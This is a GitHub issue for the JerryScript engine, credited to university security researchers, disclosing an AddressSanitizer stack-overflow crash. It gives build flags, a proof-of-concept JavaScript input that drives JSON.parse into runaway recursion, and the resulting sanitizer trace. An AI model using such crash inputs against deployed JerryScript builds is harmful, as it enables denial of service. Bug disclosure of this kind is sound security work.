search

jerryscript-project / jerryscript

Ultra-lightweight JavaScript engine for the Internet of Things.
https://jerryscript.net
Apache License 2.0
6.88k stars 666 forks source link

AddressSanitizer: stack-overflow #5074

Open Ye0nny opened 1 year ago

Ye0nny commented 1 year ago
JerryScript revision

Commit: https://github.com/jerryscript-project/jerryscript/commit/05dbbd134c3b9e2482998f267857dd3722001cd7 Version: v3.0.0

Build platform

Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)

Build steps
python ./tools/build.py --clean --debug --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --error-messages=on --system-allocator=on --logging=on --line-info=on --stack-limit=20
Test case
testcase

```javascript JSON . parse ( " [ 1 , 2 , 2 , 4 , 4 , 4 , 4 , 4 , 4 , 4 , 8 , 8 , 0 , 1 , 2 , 2 , 4 , 4 , 4 , 4 , 8 , 8 , 0 ] " , function ( func0 , t ) { return " [ " . repeat ( 32768 ) + JSON . parse ( t ) ; } ) ; str = " [ 32 " + str + " 2 > ] " ; str += " 32 : 32 === ] " ; for ( i = 0 ; i < 2048 ; i ++ ) JSON . parse . call ( str , i ) ; str += " 1 , " ; str += " 1 ] " ; JSON . parse ( str ) ; ``` 

// poc.js
JSON . parse ( " [ 1 , 2 , 2 , 4 , 4 , 4 , 4 , 4 , 4 , 4 , 8 , 8 , 0 , 1 , 2 , 2 , 4 , 4 , 4 , 4 , 8 , 8 , 0 ] " , function ( func0 , t ) { return " [ " . repeat ( 32768 ) + JSON . parse ( t ) ; } ) ;
Execution steps & Output
$ ./jerryscript/build/bin/jerry poc.js
AddressSanitizer:DEADLYSIGNAL
=================================================================
==1402144==ERROR: AddressSanitizer: stack-overflow on address 0xff64bfec (pc 0x081100a7 bp 0x00000000 sp 0xff64bff0 T0)
    #0 0x81100a7 in __sanitizer::StackDepotBase<__sanitizer::StackDepotNode, 1, 20>::Put(__sanitizer::StackTrace, bool*) (./jerryscript/build/bin/jerry+0x81100a7)
    #1 0x811007e in __sanitizer::StackDepotPut(__sanitizer::StackTrace) (./jerryscript/build/bin/jerry+0x811007e)
    #2 0x807a2d1 in __asan::Allocator::Allocate(unsigned long, unsigned long, __sanitizer::BufferedStackTrace*, __asan::AllocType, bool) (./jerryscript/build/bin/jerry+0x807a2d1)
    #3 0x8079ceb in __asan::asan_malloc(unsigned long, __sanitizer::BufferedStackTrace*) (./jerryscript/build/bin/jerry+0x8079ceb)
    #4 0x80efec3 in malloc (./jerryscript/build/bin/jerry+0x80efec3)
    #5 0x825f11c in jmem_heap_alloc ./jerryscript/jerry-core/jmem/jmem-heap.c:254:10
    #6 0x825f11c in jmem_heap_gc_and_alloc_block ./jerryscript/jerry-core/jmem/jmem-heap.c:291:24
    #7 0x8185a9d in ecma_create_object ./jerryscript/jerry-core/ecma/base/ecma-helpers.c:94:38
    #8 0x81cb9ab in ecma_op_alloc_array_object ./jerryscript/jerry-core/ecma/operations/ecma-array-object.c:58:5
    #9 0x81cb9ab in ecma_op_new_array_object ./jerryscript/jerry-core/ecma/operations/ecma-array-object.c:110:29
    #10 0x81a8a86 in ecma_builtin_json_parse_value ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:562:32
    #11 0x81a8fd8 in ecma_builtin_json_parse_value ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:573:30
    #12 0x81a8fd8 in ecma_builtin_json_parse_value ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:573:30
    ... 
    ...
    #243 0x81a8fd8 in ecma_builtin_json_parse_value ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:573:30
    #244 0x81a8fd8 in ecma_builtin_json_parse_value ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:573:30
    #245 0x81a8fd8 in ecma_builtin_json_parse_value ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:573:30
    #246 0x81a8fd8 in ecma_builtin_json_parse_value ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:573:30

SUMMARY: AddressSanitizer: stack-overflow (./jerryscript/build/bin/jerry+0x81100a7) in __sanitizer::StackDepotBase<__sanitizer::StackDepotNode, 1, 20>::Put(__sanitizer::StackTrace, bool*)
==1402144==ABORTING

Credits: @Ye0nny, @EJueon of the seclab-yonsei.